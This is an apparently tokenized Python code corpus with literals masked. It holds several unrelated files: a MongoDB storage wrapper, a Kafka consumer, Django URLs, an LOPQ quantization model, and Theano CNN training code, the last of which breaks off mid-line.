warning ( '<STR_LIT>' . format ( query ) ) <EOL> return [ ] <EOL> def load_one ( self , query , fields ) : <EOL> try : <EOL> return self . _coll . find_one ( query , fields ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( query ) ) <EOL> return None <EOL> def load_all ( self , query , fields , skip = <NUM_LIT:0> , num = <NUM_LIT:0> ) : <EOL> try : <EOL> return list ( self . _coll . find ( query , fields , skip = skip , limit = num ) ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( query ) ) <EOL> return None <EOL> def has_name_user ( self , name , user ) : <EOL> if self . _coll . find_one ( { '<STR_LIT:name>' : name , '<STR_LIT>' : user } ) : <EOL> return True <EOL> else : <EOL> return False <EOL> uidStore = UID ( ) <EOL> userStore = Crane ( ) <EOL> entityStore = Crane ( ) <EOL> pandaStore = Crane ( ) <EOL> mantisStore = Crane ( ) <EOL> turtleStore = Crane ( ) <EOL> tigressStore = Crane ( ) <EOL> workerStore = Crane ( ) <EOL> engineStore = Crane ( ) <EOL> def exit_storage ( ) : <EOL> Crane . mongoClientPool . exists ( ) <EOL> def initialize_storage ( config ) : <EOL> global uidStore , entityStore , pandaStore <EOL> global mantisStore , turtleStore , tigressStore <EOL> global userStore , engineStore <EOL> uidStore = UID ( config . uidConnectionString , <EOL> config . uidDataBaseName ) <EOL> entityStore = Crane ( config . dataConnectionString , <EOL> config . dataDataBaseName , <EOL> config . entityCollectionName ) <EOL> userStore = Crane ( config . modelConnectionString , <EOL> config . modelDataBaseName , <EOL> config . userCollectionName ) <EOL> engineStore = Crane ( config . sysConnectionString , <EOL> config . sysDataBaseName , <EOL> config . engineCollectionName ) <EOL> pandaStore = Crane ( config . modelConnectionString , <EOL> config . modelDataBaseName , <EOL> config . 
pandaCollectionName ) <EOL> mantisStore = Crane ( config . modelConnectionString , <EOL> config . modelDataBaseName , <EOL> config . mantisCollectionName ) <EOL> turtleStore = Crane ( config . modelConnectionString , <EOL> config . modelDataBaseName , <EOL> config . turtleCollectionName ) <EOL> tigressStore = Crane ( config . modelConnectionString , <EOL> config . modelDataBaseName , <EOL> config . tigressCollectionName ) <EOL> from panda import Panda <EOL> Panda . store = pandaStore <EOL> from mantis import Mantis <EOL> Mantis . store = mantisStore <EOL> from turtle import Turtle <EOL> Turtle . store = turtleStore <EOL> from tigress import Tigress <EOL> Tigress . store = tigressStore <EOL> from user import User <EOL> User . store = userStore <EOL> from engine import Engine <EOL> Engine . store = engineStore <EOL> return True <EOL> def reload_storage ( ) : <EOL> userStore . _reload ( ) <EOL> engineStore . _reload ( ) <EOL> mantisStore . _reload ( ) <EOL> pandaStore . _reload ( ) <EOL> tigressStore . _reload ( ) <EOL> turtleStore . _reload ( ) <EOL> entityStore . _reload ( ) </s>
<s> """<STR_LIT>""" <EOL> from kafka . client import KafkaClient <EOL> from kafka . consumer import SimpleConsumer <EOL> import os <EOL> import platform <EOL> if platform . system ( ) == '<STR_LIT>' : <EOL> import win32api <EOL> else : <EOL> import signal <EOL> import thread <EOL> import traceback <EOL> kafkaHost = '<STR_LIT>' <EOL> kafkaTopic = '<STR_LIT>' <EOL> kafkaGroup = '<STR_LIT>' <EOL> kafka = None <EOL> producer = None <EOL> consumer = None <EOL> def onexit ( ) : <EOL> global kafka , consumer , producer <EOL> if consumer : <EOL> consumer . commit ( ) <EOL> consumer . stop ( ) <EOL> consumer = None <EOL> if producer : <EOL> producer . stop ( ) <EOL> producer = None <EOL> if kafka : <EOL> kafka . close ( ) <EOL> kafka = None <EOL> print ( '<STR_LIT>' . format ( os . getpid ( ) ) ) <EOL> def handler ( sig , hook = thread . interrupt_main ) : <EOL> global kafka , consumer , producer <EOL> if consumer : <EOL> consumer . commit ( ) <EOL> consumer . stop ( ) <EOL> consumer = None <EOL> if producer : <EOL> producer . stop ( ) <EOL> producer = None <EOL> if kafka : <EOL> kafka . close ( ) <EOL> kafka = None <EOL> print ( '<STR_LIT>' . format ( os . getpid ( ) ) ) <EOL> exit ( <NUM_LIT:1> ) <EOL> def server ( ) : <EOL> global kafka , producer , consumer <EOL> if platform . system ( ) == '<STR_LIT>' : <EOL> win32api . SetConsoleCtrlHandler ( handler , <NUM_LIT:1> ) <EOL> else : <EOL> signal . signal ( signal . SIGINT , onexit ) <EOL> try : <EOL> kafka = KafkaClient ( kafkaHost , timeout = None ) <EOL> consumer = SimpleConsumer ( kafka , kafkaGroup , kafkaTopic , partitions = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> for message in consumer : <EOL> print ( message ) <EOL> except Exception as e : <EOL> print ( '<STR_LIT>' . format ( e ) ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( traceback . 
format_exc ( ) ) <EOL> except KeyboardInterrupt : <EOL> onexit ( ) <EOL> finally : <EOL> onexit ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> while <NUM_LIT:1> : <EOL> server ( ) </s>
<s> class PayPalFailure ( Exception ) : pass </s>
<s> from django . conf . urls import patterns <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) </s>
<s> import numpy as np <EOL> from sklearn . cluster import KMeans <EOL> import logging <EOL> import sys <EOL> from collections import namedtuple <EOL> from . utils import iterate_splits , predict_cluster <EOL> logger = logging . getLogger ( __name__ ) <EOL> logger . setLevel ( logging . WARNING ) <EOL> logger . addHandler ( logging . StreamHandler ( sys . stdout ) ) <EOL> def eigenvalue_allocation ( num_buckets , eigenvalues ) : <EOL> """<STR_LIT>""" <EOL> D = len ( eigenvalues ) <EOL> dims_per_bucket = D / num_buckets <EOL> eigenvalue_product = np . zeros ( num_buckets , dtype = float ) <EOL> bucket_size = np . zeros ( num_buckets , dtype = int ) <EOL> permutation = np . zeros ( ( num_buckets , dims_per_bucket ) , dtype = int ) <EOL> min_non_zero_eigenvalue = np . min ( np . abs ( eigenvalues [ np . nonzero ( eigenvalues ) ] ) ) <EOL> eigenvalues = eigenvalues / min_non_zero_eigenvalue <EOL> sorted_inds = np . argsort ( eigenvalues ) [ : : - <NUM_LIT:1> ] <EOL> log_eigs = np . log2 ( abs ( eigenvalues ) ) <EOL> for ind in sorted_inds : <EOL> eligible = ( bucket_size < dims_per_bucket ) . nonzero ( ) <EOL> i = eigenvalue_product [ eligible ] . argmin ( <NUM_LIT:0> ) <EOL> bucket = eligible [ <NUM_LIT:0> ] [ i ] <EOL> eigenvalue_product [ bucket ] = eigenvalue_product [ bucket ] + log_eigs [ ind ] <EOL> permutation [ bucket , bucket_size [ bucket ] ] = ind <EOL> bucket_size [ bucket ] += <NUM_LIT:1> <EOL> return np . reshape ( permutation , D ) <EOL> def compute_local_rotations ( data , C , num_buckets ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' ) <EOL> A , mu , count , assignments , residuals = accumulate_covariance_estimators ( data , C ) <EOL> R , mu = compute_rotations_from_accumulators ( A , mu , count , num_buckets ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> return R , mu , assignments , residuals <EOL> def accumulate_covariance_estimators ( data , C ) : <EOL> """<STR_LIT>""" <EOL> V = C . shape [ <NUM_LIT:0> ] <EOL> N = data . 
shape [ <NUM_LIT:0> ] <EOL> D = data . shape [ <NUM_LIT:1> ] <EOL> A = np . zeros ( ( V , D , D ) ) <EOL> mu = np . zeros ( ( V , D ) ) <EOL> count = np . zeros ( V , dtype = int ) <EOL> assignments = np . zeros ( N , dtype = int ) <EOL> residuals = np . zeros ( ( N , D ) ) <EOL> for i in xrange ( N ) : <EOL> d = data [ i ] <EOL> cluster = predict_cluster ( d , C ) <EOL> centroid = C [ cluster ] <EOL> residual = d - centroid <EOL> assignments [ i ] = cluster <EOL> mu [ cluster ] += residual <EOL> count [ cluster ] += <NUM_LIT:1> <EOL> A [ cluster ] += np . outer ( residual , residual ) <EOL> residuals [ i ] = residual <EOL> return A , mu , count , assignments , residuals <EOL> def compute_rotations_from_accumulators ( A , mu , count , num_buckets ) : <EOL> """<STR_LIT>""" <EOL> V , D = mu . shape <EOL> for i in xrange ( V ) : <EOL> num_points = count [ i ] <EOL> mu [ i ] /= num_points <EOL> cov = ( A [ i ] + A [ i ] . transpose ( ) ) / ( <NUM_LIT:2> * ( num_points - <NUM_LIT:1> ) ) - np . outer ( mu [ i ] , mu [ i ] ) <EOL> if num_points < D : <EOL> logger . warn ( '<STR_LIT>' % ( num_points , D , i ) ) <EOL> eigenvalues = np . ones ( D ) <EOL> A [ i ] = np . eye ( D ) <EOL> else : <EOL> eigenvalues , A [ i ] = np . linalg . eigh ( cov ) <EOL> permuted_inds = eigenvalue_allocation ( num_buckets , eigenvalues ) <EOL> A [ i ] = A [ i , : , permuted_inds ] <EOL> return A , mu <EOL> def project_residuals_to_local ( residuals , assignments , Rs , mu ) : <EOL> """<STR_LIT>""" <EOL> projected = np . zeros ( residuals . shape ) <EOL> for i in xrange ( residuals . shape [ <NUM_LIT:0> ] ) : <EOL> res = residuals [ i ] <EOL> a = assignments [ i ] <EOL> projected [ i ] = np . dot ( Rs [ a ] , res - mu [ a ] ) <EOL> return projected <EOL> def compute_residuals ( data , C ) : <EOL> assignments = np . 
apply_along_axis ( predict_cluster , <NUM_LIT:1> , data , C ) <EOL> residuals = data - C [ assignments ] <EOL> return residuals , assignments <EOL> def train_coarse ( data , V = <NUM_LIT:8> , kmeans_coarse_iters = <NUM_LIT:10> , n_init = <NUM_LIT:10> , random_state = None ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' ) <EOL> model = KMeans ( n_clusters = V , init = "<STR_LIT>" , max_iter = kmeans_coarse_iters , n_init = n_init , n_jobs = <NUM_LIT:1> , verbose = False , random_state = random_state ) <EOL> model . fit ( data ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> return model . cluster_centers_ <EOL> def train_subquantizers ( data , num_buckets , subquantizer_clusters = <NUM_LIT> , kmeans_local_iters = <NUM_LIT:20> , n_init = <NUM_LIT:10> , random_state = None ) : <EOL> """<STR_LIT>""" <EOL> subquantizers = list ( ) <EOL> for i , d in enumerate ( np . split ( data , num_buckets , axis = <NUM_LIT:1> ) ) : <EOL> model = KMeans ( n_clusters = subquantizer_clusters , init = "<STR_LIT>" , max_iter = kmeans_local_iters , <EOL> n_init = n_init , n_jobs = <NUM_LIT:1> , verbose = False , random_state = random_state ) <EOL> model . fit ( d ) <EOL> subquantizers . append ( model . cluster_centers_ ) <EOL> logger . info ( '<STR_LIT>' % ( i + <NUM_LIT:1> , num_buckets ) ) <EOL> return subquantizers <EOL> def train ( data , V = <NUM_LIT:8> , M = <NUM_LIT:4> , subquantizer_clusters = <NUM_LIT> , parameters = None , <EOL> kmeans_coarse_iters = <NUM_LIT:10> , kmeans_local_iters = <NUM_LIT:20> , n_init = <NUM_LIT:10> , <EOL> subquantizer_sample_ratio = <NUM_LIT:1.0> , random_state = None , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> if ( verbose ) : <EOL> logger . setLevel ( logging . DEBUG ) <EOL> Cs = Rs = mus = subquantizers = None <EOL> if parameters is not None : <EOL> Cs , Rs , mus , subquantizers = parameters <EOL> if Rs is None or mus is None : <EOL> Rs = mus = None <EOL> first_half , second_half = np . 
split ( data , <NUM_LIT:2> , axis = <NUM_LIT:1> ) <EOL> if Cs is not None : <EOL> logger . info ( '<STR_LIT>' ) <EOL> C1 , C2 = Cs <EOL> else : <EOL> C1 = train_coarse ( first_half , V , kmeans_coarse_iters , n_init , random_state ) <EOL> C2 = train_coarse ( second_half , V , kmeans_coarse_iters , n_init , random_state ) <EOL> if Rs is not None and mus is not None : <EOL> logger . info ( '<STR_LIT>' ) <EOL> Rs1 , Rs2 = Rs <EOL> mu1 , mu2 = mus <EOL> assignments1 = assignments2 = residuals1 = residuals2 = None <EOL> else : <EOL> Rs1 , mu1 , assignments1 , residuals1 = compute_local_rotations ( first_half , C1 , M / <NUM_LIT:2> ) <EOL> Rs2 , mu2 , assignments2 , residuals2 = compute_local_rotations ( second_half , C2 , M / <NUM_LIT:2> ) <EOL> subquantizer_sample_ratio = min ( subquantizer_sample_ratio , <NUM_LIT:1.0> ) <EOL> N = data . shape [ <NUM_LIT:0> ] <EOL> N2 = int ( np . floor ( subquantizer_sample_ratio * N ) ) <EOL> sample_inds = np . random . RandomState ( random_state ) . choice ( N , N2 , False ) <EOL> logger . info ( '<STR_LIT>' % ( subquantizer_sample_ratio , N2 ) ) <EOL> if assignments1 is not None : <EOL> residuals1 = residuals1 [ sample_inds ] <EOL> residuals2 = residuals2 [ sample_inds ] <EOL> assignments1 = assignments1 [ sample_inds ] <EOL> assignments2 = assignments2 [ sample_inds ] <EOL> else : <EOL> residuals1 , assignments1 = compute_residuals ( first_half [ sample_inds ] , C1 ) <EOL> residuals2 , assignments2 = compute_residuals ( second_half [ sample_inds ] , C2 ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> projected1 = project_residuals_to_local ( residuals1 , assignments1 , Rs1 , mu1 ) <EOL> projected2 = project_residuals_to_local ( residuals2 , assignments2 , Rs2 , mu2 ) <EOL> logger . 
info ( '<STR_LIT>' ) <EOL> subquantizers1 = train_subquantizers ( projected1 , M / <NUM_LIT:2> , subquantizer_clusters , kmeans_local_iters , n_init , random_state = random_state ) <EOL> subquantizers2 = train_subquantizers ( projected2 , M / <NUM_LIT:2> , subquantizer_clusters , kmeans_local_iters , n_init , random_state = random_state ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> return ( C1 , C2 ) , ( Rs1 , Rs2 ) , ( mu1 , mu2 ) , ( subquantizers1 , subquantizers2 ) <EOL> LOPQCode = namedtuple ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> class LOPQModel ( object ) : <EOL> def __init__ ( self , V = <NUM_LIT:8> , M = <NUM_LIT:4> , subquantizer_clusters = <NUM_LIT> , parameters = None ) : <EOL> """<STR_LIT>""" <EOL> self . Cs , self . Rs , self . mus , self . subquantizers = parameters if parameters is not None else ( None , None , None , None ) <EOL> if self . Cs is not None : <EOL> self . V = self . Cs [ <NUM_LIT:0> ] . shape [ <NUM_LIT:0> ] <EOL> self . num_coarse_splits = len ( self . Cs ) <EOL> else : <EOL> self . V = V <EOL> self . num_coarse_splits = <NUM_LIT:2> <EOL> if self . subquantizers is not None : <EOL> self . num_fine_splits = len ( self . subquantizers [ <NUM_LIT:0> ] ) <EOL> self . M = self . num_fine_splits * self . num_coarse_splits <EOL> self . subquantizer_clusters = self . subquantizers [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] . shape [ <NUM_LIT:0> ] <EOL> else : <EOL> self . num_fine_splits = M / <NUM_LIT:2> <EOL> self . M = M <EOL> self . subquantizer_clusters = subquantizer_clusters <EOL> def fit ( self , data , kmeans_coarse_iters = <NUM_LIT:10> , kmeans_local_iters = <NUM_LIT:20> , n_init = <NUM_LIT:10> , subquantizer_sample_ratio = <NUM_LIT:1.0> , random_state = None , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> existing_parameters = ( self . Cs , self . Rs , self . mus , self . subquantizers ) <EOL> parameters = train ( data , self . V , self . M , self . 
subquantizer_clusters , existing_parameters , <EOL> kmeans_coarse_iters , kmeans_local_iters , n_init , subquantizer_sample_ratio , <EOL> random_state , verbose ) <EOL> self . Cs , self . Rs , self . mus , self . subquantizers = parameters <EOL> def get_split_parameters ( self , split ) : <EOL> """<STR_LIT>""" <EOL> return self . Cs [ split ] if self . Cs is not None else None , self . Rs [ split ] if self . Rs is not None else None , self . mus [ split ] if self . mus is not None else None , self . subquantizers [ split ] if self . subquantizers is not None else None <EOL> def predict ( self , x ) : <EOL> """<STR_LIT>""" <EOL> coarse_codes = self . predict_coarse ( x ) <EOL> fine_codes = self . predict_fine ( x , coarse_codes ) <EOL> return LOPQCode ( coarse_codes , fine_codes ) <EOL> def predict_coarse ( self , x ) : <EOL> """<STR_LIT>""" <EOL> return tuple ( [ predict_cluster ( cx , self . Cs [ split ] ) for cx , split in iterate_splits ( x , self . num_coarse_splits ) ] ) <EOL> def predict_fine ( self , x , coarse_codes = None ) : <EOL> """<STR_LIT>""" <EOL> if coarse_codes is None : <EOL> coarse_codes = self . predict_coarse ( x ) <EOL> px = self . project ( x , coarse_codes ) <EOL> fine_codes = [ ] <EOL> for cx , split in iterate_splits ( px , self . num_coarse_splits ) : <EOL> _ , _ , _ , subC = self . get_split_parameters ( split ) <EOL> fine_codes += [ predict_cluster ( fx , subC [ sub_split ] ) for fx , sub_split in iterate_splits ( cx , self . num_fine_splits ) ] <EOL> return tuple ( fine_codes ) <EOL> def project ( self , x , coarse_codes , coarse_split = None ) : <EOL> """<STR_LIT>""" <EOL> px = [ ] <EOL> if coarse_split is None : <EOL> split_iter = iterate_splits ( x , self . num_coarse_splits ) <EOL> else : <EOL> split_iter = [ ( np . split ( x , self . num_coarse_splits ) [ coarse_split ] , coarse_split ) ] <EOL> for cx , split in split_iter : <EOL> C , R , mu , _ = self . 
get_split_parameters ( split ) <EOL> cluster = coarse_codes [ split ] <EOL> r = cx - C [ cluster ] <EOL> pr = np . dot ( R [ cluster ] , r - mu [ cluster ] ) <EOL> px . append ( pr ) <EOL> return np . concatenate ( px ) <EOL> def reconstruct ( self , codes ) : <EOL> """<STR_LIT>""" <EOL> coarse_codes , fine_codes = codes <EOL> x = [ ] <EOL> for fc , split in iterate_splits ( fine_codes , self . num_coarse_splits ) : <EOL> C , R , mu , subC = self . get_split_parameters ( split ) <EOL> sx = reduce ( lambda acc , c : np . concatenate ( ( acc , subC [ c [ <NUM_LIT:0> ] ] [ c [ <NUM_LIT:1> ] ] ) ) , enumerate ( fc ) , [ ] ) <EOL> cluster = coarse_codes [ split ] <EOL> r = np . dot ( R [ cluster ] . transpose ( ) , sx ) + mu [ cluster ] <EOL> x = np . concatenate ( ( x , r + C [ cluster ] ) ) <EOL> return x <EOL> def get_subquantizer_distances ( self , x , coarse_codes , coarse_split = None ) : <EOL> """<STR_LIT>""" <EOL> px = self . project ( x , coarse_codes ) <EOL> subquantizer_dists = [ ] <EOL> if coarse_split is None : <EOL> split_iter = iterate_splits ( px , self . num_coarse_splits ) <EOL> else : <EOL> split_iter = [ ( np . split ( px , self . num_coarse_splits ) [ coarse_split ] , coarse_split ) ] <EOL> for cx , split in split_iter : <EOL> _ , _ , _ , subC = self . get_split_parameters ( split ) <EOL> subquantizer_dists += [ ( ( fx - subC [ sub_split ] ) ** <NUM_LIT:2> ) . sum ( axis = <NUM_LIT:1> ) for fx , sub_split in iterate_splits ( cx , self . num_fine_splits ) ] <EOL> return subquantizer_dists <EOL> def get_cell_id_for_coarse_codes ( self , coarse_codes ) : <EOL> return coarse_codes [ <NUM_LIT:1> ] + coarse_codes [ <NUM_LIT:0> ] * self . V <EOL> def get_coarse_codes_for_cell_id ( self , cell_id ) : <EOL> return ( int ( np . floor ( float ( cell_id ) / self . V ) ) , cell_id % self . V ) <EOL> def export_mat ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> from scipy . io import savemat <EOL> from . 
utils import concat_new_first <EOL> Cs = concat_new_first ( self . Cs ) <EOL> Rs = concat_new_first ( self . Rs ) <EOL> mus = concat_new_first ( self . mus ) <EOL> subs = concat_new_first ( map ( concat_new_first , self . subquantizers ) ) <EOL> savemat ( filename , { '<STR_LIT>' : Cs , '<STR_LIT>' : Rs , '<STR_LIT>' : mus , '<STR_LIT>' : subs , '<STR_LIT>' : self . V , '<STR_LIT:M>' : self . M } ) <EOL> @ staticmethod <EOL> def load_mat ( filename ) : <EOL> """<STR_LIT>""" <EOL> from scipy . io import loadmat <EOL> d = loadmat ( filename ) <EOL> M = d [ '<STR_LIT:M>' ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> Cs = tuple ( map ( np . squeeze , np . split ( d [ '<STR_LIT>' ] , <NUM_LIT:2> , axis = <NUM_LIT:0> ) ) ) <EOL> Rs = tuple ( map ( np . squeeze , np . split ( d [ '<STR_LIT>' ] , <NUM_LIT:2> , axis = <NUM_LIT:0> ) ) ) <EOL> mus = tuple ( map ( np . squeeze , np . split ( d [ '<STR_LIT>' ] , <NUM_LIT:2> , axis = <NUM_LIT:0> ) ) ) <EOL> subs = tuple ( [ map ( np . squeeze , np . split ( half , M / <NUM_LIT:2> , axis = <NUM_LIT:0> ) ) for half in map ( np . squeeze , np . split ( d [ '<STR_LIT>' ] , <NUM_LIT:2> , axis = <NUM_LIT:0> ) ) ] ) <EOL> return LOPQModel ( parameters = ( Cs , Rs , mus , subs ) ) <EOL> def export_proto ( self , f ) : <EOL> """<STR_LIT>""" <EOL> from . lopq_model_pb2 import LOPQModelParams <EOL> from itertools import chain <EOL> lopq_params = LOPQModelParams ( ) <EOL> lopq_params . D = <NUM_LIT:2> * self . Cs [ <NUM_LIT:0> ] . shape [ <NUM_LIT:1> ] <EOL> lopq_params . V = self . V <EOL> lopq_params . M = self . M <EOL> lopq_params . num_subquantizers = self . subquantizer_clusters <EOL> def matrix_from_ndarray ( m , a ) : <EOL> m . values . extend ( map ( float , np . nditer ( a , order = '<STR_LIT:C>' ) ) ) <EOL> m . shape . extend ( a . shape ) <EOL> return m <EOL> def vector_from_ndarray ( m , a ) : <EOL> m . values . extend ( map ( float , np . nditer ( a , order = '<STR_LIT:C>' ) ) ) <EOL> return m <EOL> for C in self . 
Cs : <EOL> matrix_from_ndarray ( lopq_params . Cs . add ( ) , C ) <EOL> for R in chain ( * self . Rs ) : <EOL> matrix_from_ndarray ( lopq_params . Rs . add ( ) , R ) <EOL> for mu in chain ( * self . mus ) : <EOL> vector_from_ndarray ( lopq_params . mus . add ( ) , mu ) <EOL> for sub in chain ( * self . subquantizers ) : <EOL> matrix_from_ndarray ( lopq_params . subs . add ( ) , sub ) <EOL> if type ( f ) is str : <EOL> f = open ( f , '<STR_LIT:wb>' ) <EOL> f . write ( lopq_params . SerializeToString ( ) ) <EOL> f . close ( ) <EOL> @ staticmethod <EOL> def load_proto ( filename ) : <EOL> """<STR_LIT>""" <EOL> from . lopq_model_pb2 import LOPQModelParams <EOL> from . utils import concat_new_first <EOL> def halves ( arr ) : <EOL> return [ arr [ : len ( arr ) / <NUM_LIT:2> ] , arr [ len ( arr ) / <NUM_LIT:2> : ] ] <EOL> lopq_params = LOPQModelParams ( ) <EOL> try : <EOL> f = open ( filename ) <EOL> lopq_params . ParseFromString ( f . read ( ) ) <EOL> f . close ( ) <EOL> Cs = [ np . reshape ( C . values , C . shape ) for C in lopq_params . Cs ] <EOL> Rs = map ( concat_new_first , halves ( [ np . reshape ( R . values , R . shape ) for R in lopq_params . Rs ] ) ) <EOL> mus = map ( concat_new_first , halves ( [ np . array ( mu . values ) for mu in lopq_params . mus ] ) ) <EOL> subs = halves ( [ np . reshape ( sub . values , sub . shape ) for sub in lopq_params . subs ] ) <EOL> return LOPQModel ( parameters = ( Cs , Rs , mus , subs ) ) <EOL> except IOError : <EOL> print filename + "<STR_LIT>" <EOL> return None </s>
<s> import cPickle <EOL> import gzip <EOL> import os <EOL> import sys <EOL> import time <EOL> import numpy <EOL> import theano <EOL> import theano . tensor as T <EOL> from theano . tensor . shared_randomstreams import RandomStreams <EOL> from io_func . model_io import _nnet2file , _cfg2file , _file2nnet , _cnn2file , _file2cnn , log <EOL> from utils . utils import parse_arguments <EOL> from utils . learn_rates import _lrate2file , _file2lrate <EOL> from utils . network_config import NetworkConfig <EOL> from learning . sgd import train_sgd , validate_by_minibatch <EOL> from models . cnn import CNN <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> arg_elements = [ sys . argv [ i ] for i in range ( <NUM_LIT:1> , len ( sys . argv ) ) ] <EOL> arguments = parse_arguments ( arg_elements ) <EOL> required_arguments = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for arg in required_arguments : <EOL> if arguments . has_key ( arg ) == False : <EOL> print "<STR_LIT>" % ( arg ) ; exit ( <NUM_LIT:1> ) <EOL> train_data_spec = arguments [ '<STR_LIT>' ] <EOL> valid_data_spec = arguments [ '<STR_LIT>' ] <EOL> conv_nnet_spec = arguments [ '<STR_LIT>' ] <EOL> nnet_spec = arguments [ '<STR_LIT>' ] <EOL> wdir = arguments [ '<STR_LIT>' ] <EOL> cfg = NetworkConfig ( ) ; cfg . model_type = '<STR_LIT>' <EOL> cfg . parse_config_cnn ( arguments , '<STR_LIT>' + nnet_spec , conv_nnet_spec ) <EOL> cfg . init_data_reading ( train_data_spec , valid_data_spec ) <EOL> ptr_layer_number = <NUM_LIT:0> ; ptr_file = '<STR_LIT>' <EOL> if arguments . has_key ( '<STR_LIT>' ) and arguments . has_key ( '<STR_LIT>' ) : <EOL> ptr_file = arguments [ '<STR_LIT>' ] <EOL> ptr_layer_number = int ( arguments [ '<STR_LIT>' ] ) <EOL> resume_training = False <EOL> if os . path . exists ( wdir + '<STR_LIT>' ) and os . path . exists ( wdir + '<STR_LIT>' ) : <EOL> resume_training = True <EOL> cfg . lrate = _file2lrate ( wdir + '<STR_LIT>' ) <EOL> log ( '<STR_LIT>' + str ( cfg . lrate . 
epoch ) ) <EOL> numpy_rng = numpy . random . RandomState ( <NUM_LIT> ) <EOL> theano_rng = RandomStreams ( numpy_rng . randint ( <NUM_LIT:2> ** <NUM_LIT:30> ) ) <EOL> log ( '<STR_LIT>' ) <EOL> cnn = CNN ( numpy_rng = numpy_rng , theano_rng = theano_rng , cfg = cfg ) <EOL> if ( ptr_layer_number > <NUM_LIT:0> ) and ( resume_training is False ) : <EOL> _file2nnet ( cnn . layers , set_layer_num = ptr_layer_number , filename = ptr_file ) <EOL> if resume_training : <EOL> _file2nnet ( cnn . layers , filename = wdir + '<STR_LIT>' ) <EOL> log ( '<STR_LIT>' ) <EOL> train_fn , valid_fn = cnn . build_finetune_functions ( <EOL> ( cfg . train_x , cfg . train_y ) , ( cfg . valid_x , cfg . valid_y ) , <EOL> batch_size = cfg . batch_size ) <EOL> log ( '<STR_LIT>' ) <EOL> while ( cfg . lrate . get_rate ( ) != <NUM_LIT:0> ) : <EOL> train_error = train_sgd ( train_fn , cfg ) <EOL> log ( '<STR_LIT>' % ( cfg . lrate . epoch , <NUM_LIT:100> * numpy . mean ( train_error ) ) + '<STR_LIT>' ) <EOL> valid_error = validate_by_minibatch ( valid_fn , cfg ) <EOL> log ( '<STR_LIT>' % ( cfg . lrate . epoch , cfg . lrate . get_rate ( ) , <NUM_LIT:100> * numpy . mean ( valid_error ) ) + '<STR_LIT>' ) <EOL> cfg . lrate . get_next_rate ( current_error = <NUM_LIT:100> * numpy . mean ( valid_error ) ) <EOL> if cfg . lrate . epoch % cfg . model_save_step == <NUM_LIT:0> : <EOL> _nnet2file ( cnn . layers , filename = wdir + '<STR_LIT>' ) <EOL> _lrate2file ( cfg . lrate , wdir + '<STR_LIT>' ) <EOL> if cfg . param_output_file != '<STR_LIT>' : <EOL> _nnet2file ( cnn . layers , filename = cfg . param_output_file , input_factor = cfg . input_dropout_factor , factor = cfg . dropout_factor ) <EOL> log ( '<STR_LIT>' + cfg . param_output_file ) <EOL> if cfg . cfg_output_file != '<STR_LIT>' : <EOL> _cfg2file ( cnn . cfg , filename = cfg . cfg_output_file ) <EOL> log ( '<STR_LIT>' + cfg . cfg_output_file ) <EOL> if cfg . kaldi_output_file != '<STR_LIT>' : <EOL> cnn . fc_dnn . write_model_to_kaldi ( cfg . 
kaldi_output_file ) <EOL> log ( '<STR_LIT>' + cfg . kaldi_output_file ) <EOL> os . remove ( wdir + '<STR_LIT>' ) <EOL> os . remove ( wdir + '<STR_LIT>' ) </s>
<s> import cPickle <EOL> import gzip <EOL> import os <EOL> import sys <EOL> import time <EOL> import numpy <EOL> import theano <EOL> import theano . tensor as T <EOL> from theano . tensor . shared_randomstreams import RandomStreams <EOL> class HiddenLayer ( object ) : <EOL> def __init__ ( self , rng , input , n_in , n_out , W = None , b = None , <EOL> activation = T . tanh , do_maxout = False , pool_size = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> self . input = input <EOL> self . n_in = n_in <EOL> self . n_out = n_out <EOL> self . activation = activation <EOL> self . type = '<STR_LIT>' <EOL> if W is None : <EOL> W_values = numpy . asarray ( rng . uniform ( <EOL> low = - numpy . sqrt ( <NUM_LIT> / ( n_in + n_out ) ) , <EOL> high = numpy . sqrt ( <NUM_LIT> / ( n_in + n_out ) ) , <EOL> size = ( n_in , n_out ) ) , dtype = theano . config . floatX ) <EOL> if self . activation == theano . tensor . nnet . sigmoid : <EOL> W_values *= <NUM_LIT:4> <EOL> W = theano . shared ( value = W_values , name = '<STR_LIT>' , borrow = True ) <EOL> if b is None : <EOL> b_values = numpy . zeros ( ( n_out , ) , dtype = theano . config . floatX ) <EOL> b = theano . shared ( value = b_values , name = '<STR_LIT:b>' , borrow = True ) <EOL> self . W = W <EOL> self . b = b <EOL> self . delta_W = theano . shared ( value = numpy . zeros ( ( n_in , n_out ) , <EOL> dtype = theano . config . floatX ) , name = '<STR_LIT>' ) <EOL> self . delta_b = theano . shared ( value = numpy . zeros_like ( self . b . get_value ( borrow = True ) , <EOL> dtype = theano . config . floatX ) , name = '<STR_LIT>' ) <EOL> lin_output = T . dot ( input , self . W ) + self . b <EOL> if do_maxout == True : <EOL> self . last_start = n_out - pool_size <EOL> self . tmp_output = lin_output [ : , <NUM_LIT:0> : self . last_start + <NUM_LIT:1> : pool_size ] <EOL> for i in range ( <NUM_LIT:1> , pool_size ) : <EOL> cur = lin_output [ : , i : self . last_start + i + <NUM_LIT:1> : pool_size ] <EOL> self . tmp_output = T . 
